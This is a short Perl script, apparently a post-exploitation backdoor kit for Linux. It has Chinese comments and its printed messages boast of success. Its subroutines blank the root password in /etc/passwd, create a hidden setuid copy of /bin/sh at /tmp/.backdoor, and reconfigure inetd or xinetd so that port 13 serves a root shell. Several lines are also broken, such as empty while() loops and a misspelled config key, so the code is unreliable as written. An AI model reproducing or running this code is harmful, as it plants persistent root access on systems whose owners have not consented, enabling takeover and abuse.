sub rushroot
{
open (PWD,"/etc/passwd") || die "cannt find the shadow file!\n";
while()
{
chop;
$passwd.="$_\n";
last;
}
chomp $passwd;
if($passwd eq "root:x:0:0:root:/root:/bin/bash")
{
$passwd =~s/x//g;
print "rushroot success!now you can get a rootshell with null passwd";
}
else
{
print "faild....something wrong....:(((";
}
while()
{
chomp;
$passwd1.="$_\n";
}
close PWD;
open (PWD,">/etc/passwd")||die "why?";
print PWD $passwd;
print PWD $passwd1;
}
sub fakebackdoor
{
@cpsh = ("cp", "/bin/sh /tmp/.backdoor");
@chmod= ("chmod","u+s /tmp/.backdoor");
system(@cpsh);
system(@chmod);
print "success! now you can use ./tmp/.backdoor to get a root shell\n";
}
sub rushport1
{
open (RH6,"/etc/inetd.d/inetd.conf") || die "cannt find the shadow file!\n"; #这里根据版本不同可自己修改路径
while()
{
chomp;
$passwd.="$_\n";
chomp $passwd;
if ($passwd eq "daytime stream tcp nowait root internal")
{
$passwd =~s/root internal/bin\/sh -i/g;
}
last;
close RH6;
open (RH6,">/etc/inetd.d/inetd.conf")||die "faild...:("; # #这里根据版本不同可自己修改路径
print RH6 $passwd;
print "success! now you can telnet romote host at port 13 after reboot the daytime session\n";
}
}
sub rushport2
{
open (DAYTIME,">/etc/xinetd.d/daytime") || die "can't open file!";
$daytime = "service daytime\n {\n disable = no\n server =/bin/sh\n server_agrs = --norc\n id = daytime-stream\n socket_type = stream\n protocol = tcp\n user = root\n wait = no\n }\n";
print DAYTIME $daytime;
print "success! now you can telnet romote host at port 13 after reboot the daytime session\n";
}